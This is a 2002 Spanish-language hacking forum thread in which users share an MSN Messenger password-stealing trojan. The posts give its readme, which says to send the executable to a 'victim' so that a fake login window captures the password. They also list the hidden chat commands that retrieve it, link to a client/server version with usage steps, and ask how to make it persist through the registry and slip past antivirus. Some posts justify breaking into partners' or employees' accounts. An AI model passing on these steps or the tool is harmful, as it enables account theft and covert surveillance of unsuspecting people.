PDA

Ver la versión completa : Nuevo Programilla para sacar contraseña de MSN



LUK
13-09-2002, 09:13
Aki os dejo el leame de un programa ke he bajao, parece interesante:

Introducción:
Este es un sacapass de MSN Messenger no se garantiza que siempre
que lo uses saques la contaseña de la victima ya que este programa
esta basado un poco en ingenieria social.



Como se usa:
Envias el *exe a la victima, cuando lo abra le cerrará sesion en MSN
y le aparecerá una ventana de incio de sesion falsa, si introduce su
contraseña en el falso Inicio de sesion su contrseña sera tuya :), solo
debes enviarle los siguientes comandos:

Holas :) :) = Para averiguar si tiene abierto el sacapass
M$Ncomandos = Para activar los comandos
M$Npassw = Contraseña de la victima
M$Nabout = Creditos del programa
M$Nend = Para desactivar los comandos



Nota:
Para que funcionen los comandos debes enviar siempre Holas:P :P y M$Ncomandos para activarlos.
Los comandos deben ir tal como estan aqui escritos incluidas mayusculas
y minusculas, la victima nunca recibirá los mensajes de los comandos, ni verá
las respuestas a los comandos.




Lee mas abajo para descargar una version mas reciente del programa!!!


Un saludo

eXcalibur
13-09-2002, 09:33
Hay dos o tres programillas como este, yo no los he probado, pero están muy de moda.
Yo conocía uno que lo enviavas, te cerraba el Messenger y al tener que reloginarse (falso, claro), la contraseña aparecía en la conversación.

LUK
13-09-2002, 17:48
Bueno gente, funciona perfecto, asi que espero ke no haya gente posteando mas temas diciendo: "Kiero la pass de...", "Como hackear hotmail..."... plz


Un saludo

THE_CROW
13-09-2002, 20:46
podrias hacerme un manual en pdf???:D :D :D
jajajajaja

thmx
14-09-2002, 01:52
Hay una version en la red de un italiano de este mismo programa que tiene u n defecto, a le vez que tu lo usas tambien manda tu ip asi como tu pass a la siguiente vez que te conectas, como es esto crea un un troyano propio tu al mandarlo, no se como funcione pero estuvieron usando mi cuenta, les sugieron chequen el txt.

LUK
14-09-2002, 09:52
He encontrado la version v3 del programa, esta se parece ya mas a un troyano, con su server y su cliente, XD.


La teneis en: http://www.hackhispano.com/archivos/MSN_Crack_Store_v3.zip


Modo de uso:

En el *.zip van dos archivos:

-Server.exe (Este enviaremos a la persona ke keremos sacar el pass)
-Cliente.exe (Lo usaremos para conectarnos a Server.exe)

Enviamos Server.exe a nuestra "victima", cuando lo abra se le cerrará sesion de MSN
asi ke estas atento a ke inicie sesion de nuevo, cuando lo haga abres Cliente.exe metes
su direccion E-mail y conectas, cuando conecta usas las opciones de Cliente.exe.

Skinner
14-09-2002, 12:58
Del MSN hay muchas paginas dedicadas con infinidad de programas.
Una de ellas es esta: http://messenger.ipfox.com
Seguro que ya le teneis, por si las moscas ... jeje
El programa esta bien. :D

LOQUILLO
15-09-2002, 01:50
La version v3 funciona en todos las versiones disponibles de Messenger?????

LUK
15-09-2002, 10:45
A mi no me ha dado problemas con ninguna version, aunke no he probado con todas. Supongo ke no deberia dar problemas.

.Yok3R.
17-09-2002, 02:22
acaso esta mal el link????
no pude bajar el MSN crack
decidme como, por favor...:confused:

peron
17-09-2002, 08:27
He leido mensajes de la misma gente que critica a los lammers, idolatrar este tipo de programas, que por cierto son autentico software de LAMMER, por favor sean coherentes cuando critican o se hacen los pro del hacking.

PD: yo tambien he usado este tipo de programas!!

lupillo
17-09-2002, 19:26
todo el mundo ha usado este tipo de programitas no tiene nada de malo.
lo malo esta cuando el 70% de tu cerebro solo maquila formas de entrar en cuentas de hotmail ahi es cuando empiezas a cansar a la demas gente

he probado el programa, si funciona.

fermarlop
17-09-2002, 20:56
Escrito originalmente por lupillo
todo el mundo ha usado este tipo de programitas no tiene nada de malo.
lo malo esta cuando el 70% de tu cerebro solo maquila formas de entrar en cuentas de hotmail ahi es cuando empiezas a cansar a la demas gente

he probado el programa, si funciona.
----------------------------------------------------------------------------------

el tema de hotmail es como tu dices..pero considera que aveces tienes otros motivos un poco mas importantes para que te de orientaciones del perfil de la persona por cuestiones comerciales por ejemplo...

te lo digo como ejemplo pues fue mi caso sobre orientarme de que cosa estaban haciendo en mi negocio con mi dinero...en fin puede haber otros motivos...etc


saludos

=)

lupillo
17-09-2002, 22:45
en tu caso esta perfectamente justificado y yo se que hay miles como tu que por cuestiones monetarias o de negocios es necesario saber entrar a diferentes cuentas de correo pero desgraciadamente la mayoria de las personas que preguntan por hotmail son de los de:
"mi novia es bien puta y creo que anda con otro y quiero averiguar su contraseña de hotmail"

las personas como en tu caso que es imperante entrar a otra cuenta casi nunca preguntan o dejan las preguntas como ultimo recurso o solo como apoyo.

saludos.

LOQUILLO
17-09-2002, 22:52
¿¿¿Conocen algun programa hack para MAC???

THE_CROW
17-09-2002, 22:54
juasjuas Yo soy maquero y te digo que no:mad:

RECTIFICO. he encontrado un escaneador de puertos y el cliente del subseven.

van-geon
20-09-2002, 18:03
una duda sobre este programa, le he mandado el server y como soi un usuario no admitido para mi victima no se cuando lo recibe ni si esta conectado, si lo abre y yo al dia o la semana siguiente abro el client si ha abiero el server deberia funcionar correctamente no?

gracias

lupillo
20-09-2002, 20:02
Para saber si esta conectada utiliza el Real Status Viewer, le mandas el server y lo mas probable es que lo abra ese mismo dia no?

el Real Status Viewer lo bajas en: www.mess.be

.Yok3R.
23-09-2002, 02:33
Para evitarse la enviada de este archivo varias veces...para saber un pass, porke no se modifica el registro de windows al ejectutar el server, para ke lo active cada vez ke se reinicie la PC??? digo asi esta activo siempre en la PC de tu victima y tu solo usas los comandos y sacas el PASS a diestra y siniestra...;) ahora bien, aki biene el pero del asunto. ¿comó lo podría hacer?:confused:
¿con un archivo de registro? pero no pensarian ke seria un verdadero virus? Iluminenme... espero respuestas

erickperez
23-09-2002, 22:24
Alguien me puede decir en donde puedo encontrar el codigo fuente de este programa ?

lupillo
24-09-2002, 00:40
Yo creo que LUK debe tenerlo.

LUK hechanos la mano, ya que yo tambien lo quiero por favor.

Un saludo.

erickperez
24-09-2002, 05:14
Nadie sabe del codigo fuente del programa???

fermarlop
24-09-2002, 10:36
Escrito originalmente por erickperez
Nadie sabe del codigo fuente del programa??? --------------------------------



la verdad me oles a poli
ke te pasa?
pa ke keres el codigo fuente?
nos tomaste de giles?
nos metiste un verso?
ercikperez hsta eso suena a mentira..
kien sos?
usa el soft y jate de joder
ok?
para ke keres el codigo fuente si vos nos contaste ke vino un alien y te dejo sin mail..
pake?
ke kres hacer?
oles a poli...
no tas jugando limpio oles mal....
asi ke bajete el soft y usalo sino anda a cagar
ok?

saludos al foro

lupillo
25-09-2002, 01:34
uufff que respuesta!!! pero creo que sus sospechas tienen fundamentos

erickperez
25-09-2002, 14:14
Escrito originalmente por fermarlop
--------------------------------



la verdad me oles a poli
ke te pasa?
pa ke keres el codigo fuente?
nos tomaste de giles?
nos metiste un verso?
ercikperez hsta eso suena a mentira..
kien sos?
usa el soft y jate de joder
ok?
para ke keres el codigo fuente si vos nos contaste ke vino un alien y te dejo sin mail..
pake?
ke kres hacer?
oles a poli...
no tas jugando limpio oles mal....
asi ke bajete el soft y usalo sino anda a cagar
ok?

saludos al foro

De que hablas fermarlop ? que soy policia ? si tu crees que yo vi una pelicula de alien que me robo el e-mail tu pareces que te la pasaste viendo a jamesbond, 007 y peliculas de ladrones y policia, o tienes algun delirio de persecucion !

Si no te agrado mi tema anterior de que alguien me quito mi cuenta, pues no debiste de seguir leyendolo despues que leiste el post inicial para que no estes pensado y hablando tonterias. Simplemente hable de algo que me habia sucedido, si te cuesta creerlo pues no lo creas, a mi no me interesa lo que pienses, nunca te obligue hacerlo, pero no me molestes.

Si quiero el codigo fuente es porque quiero aprender mas de lo que puede aprender cualquier otro que simplemente utiliza el programa, soy programador, y tal vez pueda mejorar el programa o simplemente utilizar algunas de las tecnicas usadas en el programa para otras cosas similares.

fermarlop
25-09-2002, 18:39
Escrito originalmente por erickperez
De que hablas fermarlop ? que soy policia ? si tu crees que yo vi una pelicula de alien que me robo el e-mail tu pareces que te la pasaste viendo a jamesbond, 007 y peliculas de ladrones y policia, o tienes algun delirio de persecucion !

Si no te agrado mi tema anterior de que alguien me quito mi cuenta, pues no debiste de seguir leyendolo despues que leiste el post inicial para que no estes pensado y hablando tonterias. Simplemente hable de algo que me habia sucedido, si te cuesta creerlo pues no lo creas, a mi no me interesa lo que pienses, nunca te obligue hacerlo, pero no me molestes.

Si quiero el codigo fuente es porque quiero aprender mas de lo que puede aprender cualquier otro que simplemente utiliza el programa, soy programador, y tal vez pueda mejorar el programa o simplemente utilizar algunas de las tecnicas usadas en el programa para otras cosas similares.
----------------------------------------------
si la verdad que no fue logico lo que dije
pero tiene su explicacion ahora que recuerdo...
taba con 3 litros de buen vino argentino dentro....

disculpas del caso...;)

saludos

THE_CROW
25-09-2002, 18:42
la verdad es que te dió un "pequeño" ataque de paranoia:D , este se mete al ordenador hasta borracho:D :D

lupillo
25-09-2002, 22:35
que bonito es el alcohol!!!!:p

fermarlop
26-09-2002, 02:16
es que medio empedo vi el alien :D :D

en fin

saludos

P/D:aca al alien en argentina cuando tamos borrachos le decimos HUGOOOOOOO

lupillo
26-09-2002, 03:26
computadora: 550 US DLLS con tu Master Card

servicio de internet banda ancha: 45 US DLSS con tu Master Card

tres botellas de buen vino argentino: 60 DLLS con tu Master Card........



Responder a los post de Hackhispano cuando anda uno bien ahogado de borracho................ no tiene precio.

hay cosas en la vida que el dinero no puede comprar
:D :D :D

ramgo
26-09-2002, 22:16
el norton antivirus 2002 ya detecta el server de este programa!!!!

lupillo
27-09-2002, 01:42
si a mi tambien me lo ha detectado

fue bonito mientras duro

lupillo
28-09-2002, 00:45
si son mejores, aparte se necesita ser muy ingenuo para tragarte el server y poner tu pass despues

LOQUILLO
28-09-2002, 02:26
Mandamelo o decime donde lo puedo encontrar,please!!!

australo
29-09-2002, 19:46
EL PROBLEMA ES Q CUALQUIER ANTIVIRUS VA A DETECTAR EL SERVER.EXE QUE SE LE ENVIA A LA VICTIMA COMO TROJANO.

SALU2.

lupillo
30-09-2002, 04:56
Parece que he encontrado otro programilla similar pero no lo detecta el antivirus, lo voy a checar y si tiene buen funcionamiento lo voy a colgar.

Despues informo.

LOQUILLO
30-09-2002, 15:36
OK LUPILLO, Chequealo y si funciona colagalo. Que andes Bien!!!

lupillo
30-09-2002, 22:55
jajaja no en cuanto lo tenga lo cuelgo ok?

LOQUILLO
05-10-2002, 15:25
He Papi!!! Cuando lo vas a colgar???